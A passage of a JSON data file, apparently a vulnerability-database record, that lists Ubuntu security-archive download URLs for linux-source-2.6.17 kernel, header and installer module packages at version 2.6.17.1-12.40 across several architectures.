        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.40_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.40_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.40.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.40_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.40_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.40_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.40_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.40_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.40_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.40_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.40_amd64.udeb"
      },
      {
        "trust": 0.1,
